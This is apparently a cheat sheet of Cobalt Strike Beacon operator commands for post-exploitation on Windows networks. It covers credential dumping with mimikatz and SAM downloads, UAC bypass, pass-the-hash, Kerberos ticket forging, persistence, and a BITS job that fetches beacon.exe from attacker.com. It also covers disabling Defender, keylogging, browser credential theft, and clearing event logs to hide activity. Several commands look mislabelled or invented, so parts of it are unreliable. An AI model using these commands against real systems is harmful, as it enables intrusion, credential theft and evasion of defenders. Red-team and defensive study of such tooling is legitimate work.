Cobalt Strike Beacon
Cobalt Strike Beacon is the most widely-used commercial C2 framework. It provides sophisticated post-exploitation capabilities for Windows/Linux with multiple communication protocols.
Basic Beacon Commands
| Command | Description |
|---|---|
sleep <seconds> | Set beacon callback delay (default 60s) |
exit | Exit interactive shell, beacon stays alive |
jobs | List running background jobs |
kill <pid> | Terminate process |
ps | List processes |
cd <path> | Change directory |
pwd | Print working directory |
Process Management
# List all processes
beacon > ps
# Kill process
beacon > kill 1234
# Spawn process with output capture
beacon > run whoami
# Execute shellcode in process
beacon > inject 1234 x64 /tmp/shellcode.bin
# Create suspended process for injection
beacon > spawnas DOMAIN\user password cmd.exe
# Create process in alternate session
beacon > spawn x64 c:\windows\system32\rundll32.exeSession/Listener Management
# View active beacons
beacon > sessions
# Connect to specific beacon
interact <beacon_id>
# Rename beacon
beacon > rename "Web Server"
# Sleep callback interval
beacon > sleep 60
beacon > sleep 0 # Infinite (manual callback only)
# Note on beacon
beacon > note "Domain controller, critical system"File Operations
# Download file (staged)
beacon > download C:\Windows\System32\config\SAM /tmp/SAM
# Upload file
beacon > upload /tmp/payload.exe C:\Windows\Temp\update.exe
# List directory
beacon > ls C:\
beacon > ls -la C:\Users\Administrator\
# Create directory
beacon > mkdir C:\Temp\work
# Copy file
beacon > cp source.txt destination.txt
# Move/rename file
beacon > mv oldname.txt newname.txt
# Delete file
beacon > rm C:\Windows\Temp\payload.exeCommand Execution
# Execute shell command (PowerShell)
beacon > powershell Get-LocalUser
# Execute cmd.exe command
beacon > cmd whoami /all
# Execute with output
beacon > execute whoami
# Run executable with args
beacon > run C:\Windows\System32\whoami.exe
# Execute .NET assembly
beacon > execute-assembly /tmp/Seatbelt.exe -group=system
# Inline PowerShell execution
beacon > powerpick Get-AdComputer -Filter *
# Python execution
beacon > python import os; print(os.getcwd())Windows Credential Dumping
# LSA Secrets
beacon > execute powershell.exe -NoP -C "Get-WmiObject -Class Win32_UserAccount"
# Registry dump (SAM/SYSTEM)
beacon > download C:\Windows\System32\config\SAM
beacon > download C:\Windows\System32\config\SYSTEM
# Process memory (lsass)
beacon > steal_token 672 # SYSTEM token
beacon > inject 672 x64 /tmp/meterpreter.bin
# Mimikatz (in-process)
beacon > mimikatz !privilege::debug !token::elevate !lsadump::sam
# Vault credential dumping
beacon > execute powershell.exe -NoP -C "Get-StoredCredential"Privilege Escalation
# UAC bypass (various methods)
beacon > elevate uac-token-duplication
beacon > elevate uac-schtasks
beacon > elevate uac-eventvwr
# Direct privilege escalation exploits
beacon > exploit cve-2021-1732 # Windows Win32k Elevation
# Print spooler exploitation (PrintNightmare)
beacon > runasadmin powershell.exe -NoP -C "[...]PrintNightmare payload[...]"
# Token impersonation
beacon > steal_token 1234
beacon > impersonate DOMAIN\Administrator
beacon > rev2self # Revert to original tokenLateral Movement
# Pass-the-Hash (PTH)
beacon > pth DOMAIN\Administrator ntlmhash
# Pass-the-Ticket
beacon > kerberoast /format:hashcat /outfile:hashes.txt
# PsExec
beacon > psexec DOMAIN\Administrator hash \\target.example.com cmd.exe
# WMI lateral movement
beacon > wmi-execute \\target.example.com "whoami" Administrator hash
# Port forwarding
beacon > rportfwd 3389 192.168.1.100 3389 # Forward 3389 to target
# SOCKS proxy
beacon > socks 9050
# Use local proxy: proxychains <command>Network Reconnaissance
# Network interfaces
beacon > ifconfig
# Routing table
beacon > route
# ARP table
beacon > arp
# Netstat
beacon > netstat
# DNS query
beacon > nslookup example.com
# Ping
beacon > ping 192.168.1.1
# Tracert
beacon > tracert example.comPersistence Mechanisms
# Scheduled task
beacon > powershell.exe -NoP -C "Register-ScheduledTask -TaskName 'Update' -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute 'C:\Temp\beacon.exe')"
# Registry Run key
beacon > powershell.exe -NoP -C "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Update' -Value 'C:\Temp\beacon.exe'"
# WMI event subscription
beacon > powershell.exe -NoP -C "[...]WMI event binding payload[...]"
# Shortcut hijacking
beacon > powershell.exe -NoP -C "[...]LNK file modification[...]"
# BITS job persistence
beacon > powershell.exe -NoP -C "Start-BitsTransfer -Source 'http://attacker.com/beacon.exe' -Destination 'C:\Temp\beacon.exe' -Suspended"Defense Evasion
# Process injection
beacon > inject 1234 x64 /tmp/payload.bin
# Sleep obfuscation
beacon > sleep 3600 # Callback every hour
# Parent process spoofing
beacon > spawnto C:\Windows\System32\rundll32.exe
# API call obfuscation
beacon > powershell.exe -NoP -C "Set-Alias -Name GCI -Value Get-ChildItem"
# Disable Windows Defender
beacon > powershell.exe -NoP -C "Disable-WindowsDefenderAuditPolicy"
# AMSI bypass
beacon > powershell.exe -NoP -C "[System.Reflection.Assembly]::LoadWithPartialName('System.Core') | Out-Null..."Data Exfiltration
# Screenshot
beacon > screenshot
# Keystroke logging
beacon > keylogger start
beacon > keylogger stop
beacon > keylogger dump
# Clipboard capture
beacon > clipboard_capture
# Web camera access
beacon > webcam_snap
# Browser data extraction
beacon > execute powershell.exe -NoP -C "[...]Chrome/Firefox credential stealer[...]"
# Slow exfil (stealth)
beacon > download C:\sensitive\file.docx /tmp/ # Default is ~512KB chunksKerberos Attacks
# Kerberoast
beacon > execute-assembly /tmp/Rubeus.exe kerberoast /format:hashcat
# AS-REP roasting
beacon > execute-assembly /tmp/Rubeus.exe asreproast /format:hashcat
# Golden ticket
beacon > execute-assembly /tmp/Rubeus.exe golden /user:Administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-xxx /ticket:base64_ticket
# Silver ticket
beacon > execute-assembly /tmp/Rubeus.exe silver /user:Administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-xxx /service:cifs/target.localReconnaissance
# System information
beacon > systeminfo
# Installed patches
beacon > execute powershell.exe -NoP -C "Get-Hotfix | Select HotFixID"
# User enumeration
beacon > net user
beacon > net group "Domain Admins" /domain
# Group membership
beacon > execute whoami /groups
# Domain enumeration (BloodHound)
beacon > execute-assembly /tmp/SharpHound.exe -c All
# Share enumeration
beacon > net view \\target.example.com
beacon > net view \\target.example.com\share1Cleanup Operations
# Clear Event Log
beacon > shell wevtutil cl System
beacon > shell wevtutil cl Security
beacon > shell wevtutil cl Application
# Delete file
beacon > rm C:\Temp\beacon.exe
# Disable UAC for next session
beacon > powershell.exe -NoP -C "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
# Kill beacon process
beacon > exit # Graceful exit
# Uninstall beacon completely
# (Requires removing all persistence mechanisms manually)Exit Operations
# Exit beacon (keep running)
beacon > exit
# Interactive shell exit
shell > exit
# Job termination
beacon > jobs <job_id>
beacon > jobkill <job_id>Best Practices
- Always use sleep intervals to avoid detection
- Implement proper OPSEC (rename beacons, rotate C2 infra)
- Clean up logs after pivoting
- Use encrypted channels (HTTPS/mTLS)
- Verify target before executing irreversible operations
- Monitor for EDR/AV detection signals
- Rotate shellcode/payload signatures